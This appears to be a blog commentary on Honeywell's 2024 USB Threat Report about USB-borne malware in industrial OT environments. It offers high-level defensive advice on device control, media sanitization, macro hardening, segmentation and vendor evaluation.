Honeywell’s 2024 USB Threat Report should be required reading for any team that runs industrial control systems or manages OT environments. The report, produced by Honeywell GARD and based on aggregated telemetry from hundreds of industrial facilities, paints a clear picture: USB removable media are not an old nuisance — they are a primary vector for targeted, high-impact attacks right now.

What the headline numbers mean in practice

  • USB as a deliberate vector. Honeywell found that roughly half of the malware they observed was designed to spread via USB devices. That is a dramatic jump relative to prior years and means operators can no longer treat USB-borne files as incidental. If your operational workflows rely on flash drives for file transfers, you are in the crosshairs.

  • Silent residency and living off the land. The report highlights a rise in adversaries using USBs to establish long-term, stealthy presence inside OT networks. Attackers increasingly use legitimate OS features and document macros to persist and move laterally rather than detonating noisy exploits immediately. Think of these campaigns as espionage with the intent to turn systems against themselves later.

  • High potential for disruption. Honeywell’s data shows a large majority of detected USB-borne malware had the capability to cause loss of view, loss of control or outages in OT environments. This is not limited to data theft. The practical outcome can be production stoppages, safety incidents or lengthy recovery windows.

  • Content-based attacks are rising. The report calls out content-based malware that weaponizes common documents and scripting features. A nontrivial portion of blocked threats leveraged document functionality rather than traditional executable payloads. That matters because such files look innocuous to users and often bypass basic signature-based controls.

On telemetry and sampling

Honeywell’s findings are drawn from their GARD analysis and Secure Media Exchange telemetry, which is useful for understanding trends seen at scale, but it is also worth recognizing the sampling context. Telemetry from a vendor product will emphasize threats observable where that product is deployed. Use the report as an operational threat signal rather than a definitive census of all USB threats globally.

What to do now: a practical checklist

1) Treat removable media like network connections. Enforce strict policies that control who can introduce USB devices into OT systems. Where possible replace ad hoc USB transfers with hardened, logged transfer points or secure jump stations.

2) Implement device control and logging at endpoints. Block unknown or unauthorized device classes, require device authentication or allowlisting, and send device events to your SOC so you can investigate plug events and file activity quickly. Visibility buys time.

3) Use an offline, single-purpose sanitization and transfer station for necessary media. Make the kiosk immutable, patched, and strictly monitored. If you must move files into OT, scan and reimage files on an isolated system that is not used for other tasks.

4) Harden document handling. Disable macros by default, restrict scripting, and convert inbound documents to PDF or sanitized formats where operationally feasible. Train operators to treat unexpected files as suspicious, even if they look like routine maintenance documents.

5) Apply segmentation and least privilege in OT. Assume a USB compromise can occur and limit what a single workstation or HMI account can do. Enforce strict role separation between maintenance endpoints and control plane systems.

6) Prepare an incident playbook that includes USB-borne vectors. Exercises should cover discovery, containment, and rebuild steps for systems suspected of silent residency. Time to detection is the key metric here.

On tools and purchases: what to ask vendors

  • How do you detect content-based malware and document abuse? Signature-only coverage is not enough. Ask for behavior analysis evidence and examples.

  • What telemetry do you collect and how is data shared? Understand if their detection is based on signatures, sandboxing, static heuristics, or behavioral models. Telemetry scope affects what threats will be visible to you.

  • Can the solution integrate with OT-safe processes? Many endpoint and network tools are built for IT and can disrupt control systems. Require OT-aware deployment modes and staged testing.

Final notes

Honeywell’s 2024 report is a sharp reminder that simple physical devices remain an effective tool for modern adversaries. The shift toward content-based and living off the land techniques means defenders must treat USB hygiene as an operational safety task, not an IT checkbox. Start with policy, add endpoint controls, and validate with exercises. If you build a pragmatic, layered approach you will reduce both the likelihood of initial compromise and the blast radius when it happens.